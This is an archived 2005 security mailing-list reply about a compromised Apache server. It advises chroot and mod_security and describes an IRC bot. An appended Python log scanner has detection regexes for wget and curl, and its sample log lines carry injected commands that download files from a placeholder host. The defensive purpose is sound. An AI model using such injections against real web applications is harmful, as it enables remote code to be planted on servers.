Date: Fri, 29 Apr 2005 22:36:53 +0100
From: Steve Kemp <steve@...ve.org.uk>
To: Andrew Y Ng <ayn@...rewNg.com>
Cc: bugtraq@...urityfocus.com
Subject: Re: Apache hacks (./atac, d0s.txt)


On Fri, Apr 29, 2005 at 02:03:58PM -0500, Andrew Y Ng wrote:

> My server has been seeing some usual activities today, I don't have much time
> to get down to the bottom of things, but after I investigated briefly I have
> decided to disable PERL executable permission for www-data (Apache process's
> user), also locked /var/tmp so www-data cannot write to it. 

  Use chroot to protect your server slightly more against problems
 with any buggy scripts.

  This is almost certainly the result of an insecure PHP, Perl, or
 other CGI script - rather than an Apache hack.

  If you examine your webserver's logs you might see where the 
 attack happened, perhaps you'll have entries invoking the
 'wget' command to download the script you found from a remote
 server - that's often a common attack.

  If you're interested in protecting your server against input
 designed to attack insecure applications you might wish to
 investigate 'mod_security'.

  mod-security homepage:
	http://www.modsecurity.org/

  mod-security under Debian example:
	http://www.debian-administration.org/?article=65

> Looks like it ignores all the `kill` signals, not sure how I can actually
> kill it...

  As root.

> here's d0s.txt:

  Connects to an irc server, forking to make its name less obvious
 on the process list.

Steve
--
# Debian System Administration
www.debian-administration.org/
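
The log check suggested in the reply above, as an added example that is not part of the original post: a Python scan of Apache access-log lines for requests whose URL-decoded query carries a downloader command followed by a URL. The regular expressions, the list of downloader names and the sample lines (documentation addresses, a hypothetical view.pl script) are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Apache common/combined log format: host ident user [time] "request" status ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"[A-Z]+ (?P<uri>\S+)[^"]*" (?P<status>\d{3}) ')

# A downloader command followed by a URL inside the decoded request (assumed list).
DOWNLOAD_RE = re.compile(
    r'(?<![\w.-])(?:wget|curl|lwp-download)\s[^&]*?(?:https?|ftp)://', re.I)

def decode(uri, rounds=3):
    """Undo up to `rounds` layers of URL-encoding (double encoding is common)."""
    for _ in range(rounds):
        new = unquote_plus(uri)
        if new == uri:
            break
        uri = new
    return uri

def find_download_attempts(lines):
    """Return (host, time, status, decoded_uri) for matching requests."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line; skip it
        uri = decode(m.group('uri'))
        if DOWNLOAD_RE.search(uri):
            hits.append((m.group('host'), m.group('time'),
                         int(m.group('status')), uri))
    return hits

# Constructed sample lines: two suspicious requests, two benign ones, one junk line.
SAMPLE = [
    '203.0.113.9 - - [29/Apr/2005:13:41:07 -0500] "GET /cgi-bin/view.pl?page=x%7Cwget%20http://192.0.2.10/d0s.txt%7C HTTP/1.0" 200 512',
    '203.0.113.9 - - [29/Apr/2005:13:41:09 -0500] "GET /index.php?inc=a;curl%2520-O%2520http://192.0.2.10/atac HTTP/1.0" 200 87',
    '198.51.100.4 - - [29/Apr/2005:13:42:00 -0500] "GET /docs/wget-howto.html HTTP/1.1" 200 4096',
    '198.51.100.4 - - [29/Apr/2005:13:42:30 -0500] "GET /search?q=curl+tutorial HTTP/1.1" 200 2048',
    'not an access log line',
]

if __name__ == "__main__":
    for hit in find_download_attempts(SAMPLE):
        print(*hit, sep="  ")
```

A hit with status 200 only shows that the vulnerable script answered, so each match is a lead for reviewing that script and the files it could write, not proof of compromise.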



